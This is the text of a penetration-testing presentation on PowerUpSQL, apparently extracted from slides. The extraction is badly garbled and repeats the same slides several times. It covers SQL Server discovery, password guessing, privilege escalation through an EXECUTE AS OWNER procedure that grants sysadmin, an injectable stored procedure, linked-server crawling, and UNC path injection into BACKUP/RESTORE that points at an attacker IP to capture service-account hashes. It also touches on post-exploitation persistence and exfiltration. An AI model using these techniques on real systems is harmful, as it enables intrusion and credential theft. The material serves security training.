Presentation Overview Why SQL Server and PowerShell
PowerUpSQL Overview
Finding amp Accessing SQL Servers
Privilege Escalation Scenarioso Domain user to SQL Server logino SQL Server Login to Sysadmino Sysadmin to Windows Admino Windows Admin to Sysadmino Domain Escalation
Post Exploitation Activities
General Recommendations
Why SQL Server Used in most enterprise environments
Supports local Windows and Domain authentication
Integrates with lots of Windows applications
Generally has trust relationships that other donrsquot
Why PowerShell Native to Windows
Run commands in memory
Run managed net code
Run unmanaged code
Avoid detection by legacy Anti-virus
Already flagged as trusted by most application whitelist solutions
A medium used to write many open source Pentest toolkits
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Presentation Overview Why SQL Server and PowerShell
PowerUpSQL Overview
Finding amp Accessing SQL Servers
Privilege Escalation Scenarioso Domain user to SQL Server logino SQL Server Login to Sysadmino Sysadmin to Windows Admino Windows Admin to Sysadmino Domain Escalation
Post Exploitation Activities
General Recommendations
Why SQL Server Used in most enterprise environments
Supports local Windows and Domain authentication
Integrates with lots of Windows applications
Generally has trust relationships that other donrsquot
Why PowerShell Native to Windows
Run commands in memory
Run managed net code
Run unmanaged code
Avoid detection by legacy Anti-virus
Already flagged as trusted by most application whitelist solutions
A medium used to write many open source Pentest toolkits
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Presentation Overview Why SQL Server and PowerShell
PowerUpSQL Overview
Finding amp Accessing SQL Servers
Privilege Escalation Scenarioso Domain user to SQL Server logino SQL Server Login to Sysadmino Sysadmin to Windows Admino Windows Admin to Sysadmino Domain Escalation
Post Exploitation Activities
General Recommendations
Why SQL Server Used in most enterprise environments
Supports local Windows and Domain authentication
Integrates with lots of Windows applications
Generally has trust relationships that other donrsquot
Why PowerShell Native to Windows
Run commands in memory
Run managed net code
Run unmanaged code
Avoid detection by legacy Anti-virus
Already flagged as trusted by most application whitelist solutions
A medium used to write many open source Pentest toolkits
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
